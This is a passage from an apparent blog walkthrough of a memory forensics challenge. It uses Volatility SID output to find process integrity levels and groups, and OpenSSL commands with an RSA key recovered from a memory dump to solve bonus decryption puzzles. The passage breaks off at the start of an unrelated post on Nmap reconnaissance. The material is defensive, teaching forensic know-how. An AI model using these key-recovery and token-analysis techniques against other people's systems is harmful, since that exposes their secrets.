</pre></div></div><div><br /></div></div><div><div>We started looking at ncat.exe earlier in this process and spent a reasonable amount of time on it, so let's go back to looking at permissions, this time through the SIDs in its token.</div><div><br /></div><div><b>Q:</b> What "<i>integrity level</i>" is the <i>ncat.exe</i> process running at?</div><div><b>A:</b> Medium Mandatory Level (S-1-16-8192).</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the <i>"Domain Users" </i>group?</div><div><b>A:</b> Yes, going by the label Volatility attaches to RID 513 of the S-1-5-21 domain below. Treat that label with some care: RID 513 is also the primary group of every account on a standalone host (where it is named "None"), and the same token carries S-1-5-113 Local Account, so confirm domain membership from the host's registry rather than from this label alone.</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the <i>"Domain Admins"</i> or <i>"Enterprise Admin"</i> group?</div><div><b>A:</b> No. Neither RID 512 (Domain Admins) nor RID 519 (Enterprise Admins) appears in the token.</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the local <i>"Administrators"</i> group?</div><div><b>A</b>: Yes. Note, though, that Administrators appearing in a token that is only at Medium integrity is what a UAC-filtered token looks like: the group is present as deny-only, and getsids does not print group attributes. So the user is an administrator, but this ncat.exe was not running with administrative rights.</div><div>896 ncat.exe S-1-5-114 Local Account (Member of Administrators)</div><div>896 ncat.exe S-1-5-32-544 Administrators</div><div><br /></div><div><b>Q:</b> What type of authentication mechanism is the user of this process using? eg. LM, NTLM, Kerberos, Digest, SChannel?</div><div><b>A:</b> NTLM Authentication, from the well-known S-1-5-64-10 SID. That fits a local-account logon, which cannot use Kerberos.</div><div>896 ncat.exe S-1-5-64-10 NTLM Authentication</div><div><br /></div><div>Below answers all the questions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids --pid 896</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
896 ncat.exe S-1-1-0 Everyone
896 ncat.exe S-1-5-114 Local Account (Member of Administrators)
896 ncat.exe S-1-5-32-544 Administrators
896 ncat.exe S-1-5-32-545 Users
896 ncat.exe S-1-5-4 Interactive
896 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
896 ncat.exe S-1-5-11 Authenticated Users
896 ncat.exe S-1-5-15 This Organization
896 ncat.exe S-1-5-113 Local Account
896 ncat.exe S-1-5-5-0-1032752 Logon Session
896 ncat.exe S-1-2-0 Local (Users with the ability to log in locally)
896 ncat.exe S-1-5-64-10 NTLM Authentication
896 ncat.exe S-1-16-8192 Medium Mandatory Level</span>
</pre></div></div><div><br /></div></div><div><div>Earlier we saw there is a PowerShell History log. </div><div><br /></div><div>Also, here is the evidence from the process list: six powershell.exe processes, three still running (no exit time) and three that had already exited but whose process objects were still in memory when this capture was taken.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep powershell
2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled
2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled
4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A Disabled
644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A Disabled
4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A Disabled
4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What "Integrity Level" is being used by this/these "powershell.exe"?</div><div><b>A:</b> Three of the six, PIDs 2992, 2252 and 4120, carry the System Mandatory Level; the other three (4728, 644 and 4852) are at High Mandatory Level. From the pslist output above, 2992, 2252 and 4120 have exit times and zero threads, so these are the tokens of processes that had already terminated but whose EPROCESS objects were still in memory. </div><div><br /></div><div><b>Q:</b> What is/are the PID of the powershell.exe(s) with the highest "Integrity Level"?</div><div><b>A:</b> 2992, 2252 and 4120</div><div><br /></div><div><b>Q:</b> What is the "Integrity Level SID" for this "Integrity Level"?</div><div><b>A:</b> S-1-16-16384</div><div><br /></div><div><b>Q:</b> What other "Integrity Levels" have we seen powershell.exe running with?</div><div><b>A:</b> High Mandatory Level (S-1-16-12288), for PIDs 4728, 644 and 4852: elevated, but not SYSTEM.</div></div><div><br /></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 2992 2252 4728 644 4852 4120 | grep --ignore-case Mandatory
2992 powershell.exe S-1-16-16384 System Mandatory Level
2252 powershell.exe S-1-16-16384 System Mandatory Level
4728 powershell.exe S-1-16-12288 High Mandatory Level
644 powershell.exe S-1-16-12288 High Mandatory Level
4852 powershell.exe S-1-16-12288 High Mandatory Level
4120 powershell.exe S-1-16-16384 System Mandatory Level</span>
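</pre></div></div><div><br /></div><div>The ncat.exe token questions and the powershell.exe integrity questions above are both served by the Python below, an added example that is not code from the original post or from Volatility. It reads the "PID Process SID Name" rows that windows.getsids prints, decodes the integrity level from the number in the S-1-16 SID instead of its label, flags the Administrators-at-Medium combination that marks a UAC-filtered token, records the authentication-package SID, and picks the highest-integrity PIDs from the data rather than by eye. The sample rows are copied from the two getsids outputs above (a subset for ncat.exe).</div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px; color: white;">
```python
"""Summarise windows.getsids rows per process: integrity level, Administrators
membership and authentication-package SID.

Added example, not part of the original post. Input is the 'PID Process SID Name'
rows printed by windows.getsids. The integrity level is decoded from the number
in the S-1-16 SID rather than from its label, and the highest level present is
picked by the data instead of by eye.
"""
from collections import defaultdict

ADMINISTRATORS_SID = "S-1-5-32-544"
INTEGRITY_PREFIX = "S-1-16-"
# Well-known authentication-package SIDs. Kerberos logons receive none of these.
AUTH_PACKAGE_SIDS = {"S-1-5-64-10": "NTLM", "S-1-5-64-14": "SChannel", "S-1-5-64-21": "Digest"}
# Mandatory-label RIDs from highest to lowest: 0x5000, 0x4000, 0x3000, 0x2100, 0x2000, 0x1000, 0.
INTEGRITY_LEVELS = [(20480, "Protected"), (16384, "System"), (12288, "High"),
                    (8448, "Medium Plus"), (8192, "Medium"), (4096, "Low"), (0, "Untrusted")]


def integrity_name(rid):
    """Map an integrity RID to its level name; values between levels round down."""
    for floor, name in INTEGRITY_LEVELS:
        if rid >= floor:
            return name
    return "Untrusted"


def summarize_tokens(lines):
    """Return {pid: summary dict} built from getsids rows; other lines are ignored."""
    per_pid = defaultdict(lambda: {"process": None, "sids": set(),
                                   "integrity_rid": None, "auth_package": None})
    for line in lines:
        parts = line.split(maxsplit=3)  # PID, process, SID, free-text name
        if len(parts) >= 3 and parts[0].isdigit() and parts[2].startswith("S-1-"):
            pid, process, sid = parts[0], parts[1], parts[2]
            entry = per_pid[pid]
            entry["process"] = process
            entry["sids"].add(sid)
            if sid.startswith(INTEGRITY_PREFIX):
                entry["integrity_rid"] = int(sid[len(INTEGRITY_PREFIX):])
            if sid in AUTH_PACKAGE_SIDS:
                entry["auth_package"] = AUTH_PACKAGE_SIDS[sid]
    for entry in per_pid.values():
        rid = entry["integrity_rid"]
        entry["integrity"] = integrity_name(rid) if rid is not None else None
        entry["admin_group"] = ADMINISTRATORS_SID in entry["sids"]
        # Administrators present but only Medium integrity is the shape of a
        # UAC-filtered token: the group is there as deny-only, and getsids does
        # not print group attributes, so this must not be read as admin rights.
        entry["uac_filtered_hint"] = entry["admin_group"] and rid == 8192
    return dict(per_pid)


def highest_integrity(summary):
    """PIDs whose integrity RID equals the highest RID seen in the summary."""
    rids = [e["integrity_rid"] for e in summary.values() if e["integrity_rid"] is not None]
    if not rids:
        return []
    top = max(rids)
    return sorted(pid for pid, e in summary.items() if e["integrity_rid"] == top)


# Sample rows copied from the getsids output on this page (a subset for ncat.exe).
SAMPLE_GETSIDS = """\
PID Process SID Name
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
896 ncat.exe S-1-5-32-544 Administrators
896 ncat.exe S-1-5-113 Local Account
896 ncat.exe S-1-5-64-10 NTLM Authentication
896 ncat.exe S-1-16-8192 Medium Mandatory Level
2992 powershell.exe S-1-16-16384 System Mandatory Level
2252 powershell.exe S-1-16-16384 System Mandatory Level
4728 powershell.exe S-1-16-12288 High Mandatory Level
644 powershell.exe S-1-16-12288 High Mandatory Level
4852 powershell.exe S-1-16-12288 High Mandatory Level
4120 powershell.exe S-1-16-16384 System Mandatory Level
""".splitlines()

if __name__ == "__main__":
    summary = summarize_tokens(SAMPLE_GETSIDS)
    for pid, e in summary.items():
        print(pid, e["process"], e["integrity"], "admin-group" if e["admin_group"] else "",
              "UAC-filtered?" if e["uac_filtered_hint"] else "", e["auth_package"] or "")
    print("highest integrity:", highest_integrity(summary))
```
</pre></div></div><div><br /></div><div>Feeding it the getsids output for every PID in pslist gives one line per process; the ones worth a second look are any process at System or High integrity whose parent should not be able to grant that, and any Medium-integrity process whose token nonetheless lists Administrators.</div><div><br /></div><div><div><pre>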
</pre></div></div><div><br /></div></div><div><div>Well, that's it for this challenge!</div><div><br /></div><div>With the understanding above, and if you completed the tasks above, these bonus questions should be relatively easy.</div><div><br /></div><div><b>Bonus question 1: Decrypt the file "encrypted_w_priv_key.enc" to find the phrase that pays.</b></div><div><br /></div><div>Here is how I encrypted the file using the private key (the server.key recovered from memory earlier), which means you need to use the public key to decrypt.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign -out encrypted_w_priv_key.enc</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>As always, I can verify the file's content is encrypted.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">hexdump --canonical encrypted_w_priv_key.enc
00000000 60 8a d3 84 6f 04 b3 4e 50 58 8a cd 59 88 1b e1 |`...o..NPX..Y...|
00000010 78 fb 5c 85 25 9a c9 4e da ad 64 ee 51 a1 3d 4b |x.\.%..N..d.Q.=K|
00000020 61 aa 44 4f a8 f9 92 9c 7d b6 5d 7b db c4 c1 83 |a.DO....}.]{....|
00000030 69 e5 6d 4a 79 b3 12 e8 fe fb bf 09 2a 5e 6f f6 |i.mJy.......*^o.|
00000040 37 52 01 84 df c6 01 31 ec d0 61 d0 a2 6f e7 46 |7R.....1..a..o.F|
00000050 ad 7a e6 b8 8d 89 31 1c fa 0c 65 35 65 74 21 d2 |.z....1...e5et!.|
00000060 77 d0 96 87 da e5 1b 3a 1f cf ae 40 27 cd 3f 31 |w......:...@'.?1|
00000070 f1 c2 3a 64 a7 9f 9a 98 59 f8 43 cf 09 75 19 88 |..:d....Y.C..u..|
00000080</span>
</pre></div></div><div><br /></div></div><div><div>Because we used the private key to encrypt, we need the public key to decrypt.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -hexdump -verify
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
0000 - 50 48 52 41 53 45 20 54-48 41 54 20 50 41 59 53 PHRASE THAT PAYS
0010 - 3a 2a 2a 70 75 62 6c 69-63 5f 6b 65 79 5f 64 65 :**public_key_de
0020 - 63 72 79 70 74 65 64 2a-2a 0a crypted**.</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Voila! There we go, we have recovered the contents. rsautl is deprecated in OpenSSL 3, as the warning says; pkeyutl -verifyrecover performs the same public-key recovery. I could also have written the result out to a file instead, if needed:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -verify --out decrypted.txt
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat decrypted.txt
PHRASE THAT PAYS:**public_key_decrypted**</span>
</pre></div></div><div><br /></div></div><div>Ok! Caveat here for those that are paying attention!! I did not actually "encrypt" the data above, as I did not use the "<i>-encrypt</i>" option but instead "<i>-sign</i>". Signing and encrypting are two different things. </div><div><br /></div><div>With "<i>-sign</i>" and no digest option, pkeyutl does not hash the input at all: it pads the raw bytes with PKCS#1 v1.5 block type 1 (0x00 0x01, a run of 0xFF bytes, 0x00, then the message) and applies the RSA private-key operation to that block. Nothing in that step is random, which is why every run of "<i>echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign</i>" produces the same output, and why the public key handed the original text straight back: the message was never reduced to a digest. A signature proves who produced the data; anyone holding the public key (for a TLS server key, everyone) can read it, so this gives no confidentiality. </div><div><br /></div><div>This is different from "<i>echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -encrypt</i>", which uses block type 2 padding whose filler bytes are drawn at random. That is why the output differs on every run. Go ahead and test it for yourself.</div></div><div><br /></div><div><br /></div><div>While I cheated above, here is the actual encrypting and decrypting.</div><div><br /></div><div><div><b>Bonus question 2: Decrypt the file "encrypted_w_pub_key.enc" to find the phrase that pays.</b></div><div>Here is how I encrypted the file using the public key, which means you need to use the private key to decrypt.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo -e 'PHRASE THAT PAYS:**private_key_decrypted**' | </span><b><span style="color: #fcff01;">openssl pkeyutl -encrypt -inkey mem_server_pub.pem</span></b><span style="color: white;"> -pubin -out encrypted_w_pub_key.enc</span>
</pre></div></div><div><br /></div>While I created the contents on one line and encrypted it, we can still run <i>xxd </i>or <i>hexdump </i>or another hex editor on the file, to confirm its content is encrypted.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">hexdump --canonical encrypted_w_pub_key.enc
00000000 4f 3a 60 1b 9d 67 78 44 51 34 8e dd 8e a7 c6 04 |O:`..gxDQ4......|
00000010 13 5f e1 77 1f c1 b5 a4 30 f9 47 82 ad 0b 54 27 |._.w....0.G...T'|
00000020 dc 4b 74 7d 08 ea 6b 5b db 73 ad a6 a7 08 ea 14 |.Kt}..k[.s......|
00000030 72 d7 2e a0 7e 43 1a 6d 94 5a 03 83 ea 1c 01 9c |r...~C.m.Z......|
00000040 1d 67 84 7b 89 86 db 6b ea 78 c4 41 1d a1 ce 7c |.g.{...k.x.A...||
00000050 2f 91 15 ff b0 08 6c c8 bd 9b fe 88 c8 a9 f8 e6 |/.....l.........|
00000060 b3 ca 38 63 71 f8 61 7f 78 52 8a 96 be c6 f8 ac |..8cq.a.xR......|
00000070 a6 5b 8f 22 b9 59 3d cc 02 bf c8 ed f2 b9 aa ea |.[.".Y=.........|
00000080</span>
</pre></div></div><div><br /></div><div>With that confirmed: because the public key did the encrypting, only the private key can decrypt, the reverse of bonus question 1. Let's do just that.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><b><span style="color: #fcff01;">-decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat</span></b><span style="color: white;"> -in encrypted_w_pub_key.enc | hexdump --canonical
00000000 50 48 52 41 53 45 20 54 48 41 54 20 50 41 59 53 |PHRASE THAT PAYS|
00000010 3a 2a 2a 70 72 69 76 61 74 65 5f 64 65 79 5f 64 |:**private_key_d|
00000020 65 63 72 79 70 74 65 64 2a 2a 0a |ecrypted**.|
0000002b</span>
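</pre></div></div><div><br /></div><div>The caveat in bonus question 1 (same output every time with -sign, different output every time with -encrypt) comes down to the padding that PKCS#1 v1.5 puts in front of the message before the RSA operation. The Python below is an added example, not code from the original post or from OpenSSL: it builds both padding types, recovers the message from each, and shows which one is repeatable. It deliberately leaves out the modular exponentiation, which is a fixed permutation and adds no randomness. The block size of 128 bytes is taken from the two hexdumps above, both of which are exactly 0x80 bytes, the modulus size of a 1024-bit RSA key.</div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px; color: white;">
```python
"""Why 'pkeyutl -sign' output never changes while 'pkeyutl -encrypt' output does.

Added example, not part of the original post. The RSA modular exponentiation is
left out on purpose: it is a fixed permutation of the padded block, so every bit
of randomness (or its absence) comes from the PKCS#1 v1.5 padding applied first.
Block type 1 (signing) fills with 0xFF bytes; block type 2 (encryption) fills
with random non-zero bytes. Neither hashes the message, which is why the public
key handed the text straight back above. k is the modulus size in bytes; both
.enc files on this page are 0x80 = 128 bytes, i.e. a 1024-bit key.
"""
import os


def pad_type1(message, k):
    """EM = 0x00 0x01 PS 0x00 M with PS all 0xFF (RFC 8017 section 9.2). Deterministic."""
    if len(message) + 11 > k:
        raise ValueError("message too long for a %d-byte modulus" % k)
    ps = b"\xff" * (k - len(message) - 3)
    return b"\x00\x01" + ps + b"\x00" + message


def pad_type2(message, k):
    """EM = 0x00 0x02 PS 0x00 M with PS random and non-zero (RFC 8017 section 7.2.1)."""
    if len(message) + 11 > k:
        raise ValueError("message too long for a %d-byte modulus" % k)
    needed = k - len(message) - 3
    ps = b""
    while len(ps) != needed:  # os.urandom may yield zero bytes; drop them and top up
        ps += bytes(b for b in os.urandom(needed - len(ps)) if b != 0)
    return b"\x00\x02" + ps + b"\x00" + message


def unpad(em, block_type):
    """Recover M from a padded block, checking what a verifier or decryptor checks."""
    if em[0] != 0 or em[1] != block_type:
        raise ValueError("bad block header")
    sep = em.index(b"\x00", 2)  # first 0x00 after the header ends the padding string
    if sep - 2 >= 8 and (block_type == 2 or em[2:sep] == b"\xff" * (sep - 2)):
        return em[sep + 1:]
    raise ValueError("bad padding string")


def compare_runs(message, k=128):
    """Pad the same message twice each way and report which padding is repeatable."""
    sig1, sig2 = pad_type1(message, k), pad_type1(message, k)
    enc1, enc2 = pad_type2(message, k), pad_type2(message, k)
    return {"sign_repeatable": sig1 == sig2,
            "encrypt_repeatable": enc1 == enc2,
            "both_recover": unpad(sig1, 1) == message and unpad(enc1, 2) == message}


if __name__ == "__main__":
    # echo appends a newline, so the message ends in 0x0a just like the recovered text above.
    print(compare_runs(b"PHRASE THAT PAYS:**public_key_decrypted**\n"))
```
</pre></div></div><div><br /></div><div>The type 1 block is the same bytes on every call, so the private-key operation on it is the same 128 bytes on every call; the type 2 block changes with every call, so the ciphertext does too. The 11-byte minimum overhead in both functions is also why a 1024-bit key can only wrap 117 bytes of message, and a 1024-bit RSA key is itself below current recommendations.</div><div><br /></div><div><div><pre>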
</pre></div></div><div><br /></div></div></div><div><div><br /></div><div>Voila! We have the phrase that pays, recovered in plain text.</div><div><br /></div><div>Hope you enjoyed this memory forensics challenge.</div></div></div></div></div><div><br /></div><div>References:</div><div><div><a href="https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf">CheatSheet_v2.4 (volatilityfoundation.org)</a></div><div><a href="https://blog.onfvp.com/post/volatility-cheatsheet/">Volatility 3 CheatSheet - onfvpBlog [Ashley Pearson]</a></div><div><a href="https://npcap.com/">Npcap: Windows Packet Capture Library & Driver</a></div><div><a href="https://volatility3.readthedocs.io/en/latest/getting-started-windows-tutorial.html">Windows Tutorial — Volatility 3 2.5.2 documentation</a></div><div><a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/integrity-levels">Integrity Levels - HackTricks</a><br /><a href="https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/bb625963(v=msdn.10)">Windows Integrity Mechanism Design | Microsoft Learn</a><br /><a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers">Security identifiers | Microsoft Learn</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-components">SID Components - Win32 apps | Microsoft Learn</a></div><div><a href="https://www.malwarebytes.com/blog/news/2015/12/an-introduction-to-image-file-execution-options">An Introduction to Image File Execution Options | Malwarebytes Labs</a></div><div><a href="https://www.computerhope.com/unix/xxd.htm">Linux Xxd Command Help and Examples (computerhope.com)</a></div><div><a href="https://linux.die.net/man/1/xxd">xxd(1): make hexdump/do reverse - Linux man page (die.net)</a></div><div><a href="https://zeltser.com/media/docs/malware-analysis-remnux.pdf">zeltser.com/media/docs/malware-analysis-remnux.pdf</a></div><div><a 
href="https://www.first.org/resources/papers/conference2009/schuster-andreas-sliders.pdf">schuster-andreas-sliders.pdf (first.org)</a></div><div><a href="https://www.aldeid.com/wiki/Volatility">Volatility - aldeid</a></div><div><a href="https://docs.google.com/presentation/u/0/d/1KsZGF6cQ-N8ngABFGCZf8pTQQ5CZ19VoAHq5cO5ZPdE/htmlpresent?pli=1">Memory Forensics with Volatility. - Google Slides</a></div><div><a href="https://volatility3.readthedocs.io/en/stable/">Volatility 3 — Volatility 3 2.5.0 documentation</a></div><div><a href="https://github.com/volatilityfoundation/volatility/wiki/Command-Reference-Mal">Command Reference Mal · volatilityfoundation/volatility Wiki (github.com)</a></div><div><a href="https://web.archive.org/web/20121008220803/http://www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf">Wayback Machine (archive.org)</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys">Run and RunOnce Registry Keys - Win32 apps | Microsoft Learn</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/ssh.1.html">ssh(1) - Linux manual page (man7.org)</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/objdump.1.html">objdump(1) - Linux manual page (man7.org)</a></div><div><a href="https://www.tutorialspoint.com/assembly_programming/assembly_basic_syntax.htm">Assembly - Basic Syntax (tutorialspoint.com)</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32">IMAGE_OPTIONAL_HEADER32 (winnt.h) - Win32 apps | Microsoft Learn</a></div><div><a href="https://blog.kowalczyk.info/articles/pefileformat.html">Portable Executable File Format (kowalczyk.info)</a></div><div><a href="https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/">A Comprehensive Guide To PE Structure, The Layman's Way (tech-zealots.com)</a></div><div><a 
href="https://www.securitynik.com/2015/07/windows-10-analyzing-filezillaexe.html">Learning by practicing: Windows 10 - Analyzing "FILEZILLA.EXE-93859B09.pf" prefetch file (securitynik.com)</a></div><div><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status#redirection_messages">HTTP response status codes - HTTP | MDN (mozilla.org)</a></div><div><a href="https://httpd.apache.org/docs/2.4/logs.html">Log Files - Apache HTTP Server Version 2.4</a></div><div><a href="https://curl.se/docs/releases.html">curl - Release Table</a></div><div><a href="https://stackoverflow.com/questions/63195304/difference-between-pem-crt-key-files">ssl - Difference between pem, crt, key files - Stack Overflow</a></div><div><a href="https://www.ssldragon.com/blog/pem-file/">What Is a .pem File? A Comprehensive Guide - SSL Dragon</a></div><div><a href="https://opensource.com/article/21/4/encryption-decryption-openssl">Encrypting and decrypting files with OpenSSL | Opensource.com</a></div><div><a href="https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/bb625963(v=msdn.10)">Windows Integrity Mechanism Design | Microsoft Learn</a></div><div><a href="https://stackoverflow.com/questions/13732826/convert-pem-to-crt-and-key">ssl - Convert .pem to .crt and .key - Stack Overflow</a></div><div><a href="https://blog.pleets.org/article/en/encryption-with-private-key-openssl">Asymmetric Cryptography in OpenSSL - Private Key (pleets.org)</a></div><div><a href="https://www.encryptionconsulting.com/education-center/encryption-and-signing/">What is the difference between Encryption and Signing? Why should you use digital signatures? | Encryption Consulting</a></div><div><a href="https://stackoverflow.com/questions/454048/what-is-the-difference-between-encrypting-and-signing-in-asymmetric-encryption">rsa - What is the difference between encrypting and signing in asymmetric encryption? 
- Stack Overflow</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-64767539112013545472024-01-31T07:49:00.000-08:002024-01-31T07:49:08.563-08:00Knock! Knock!! Anyone There? - Reconnaissance and Defense<p>In a recent session with our team as part of our <i>MDR Wednesdays</i> program, we were discussing reconnaissance and the use of port 0. Quite a few people were surprised to hear that port 0 has any role in reconnaissance at all. This blog post is meant as an additional resource to aid that understanding. </p><p>Reconnaissance is one of the first steps any threat actor performs in an attack. It is the first column in the <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&CK Framework</a> and, similarly, the first phase of the <a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html" target="_blank">Cyber Kill Chain</a>. That is how important this task is. This post focuses on "<i>active</i>" reconnaissance. To learn more about "<i>passive</i>" reconnaissance, see <a href="https://www.securitynik.com/2017/03/the-importance-of-reconnaissance-to.html" target="_blank">this link</a>.</p><p>To keep this realistic, we will use Nmap, the most widely used network scanning and mapping tool. </p><p>Now let's be clear: if you are in an enterprise, I expect you have a security team and firewalls deployed to prevent some of these reconnaissance measures. At the same time, it is quite possible you are in an 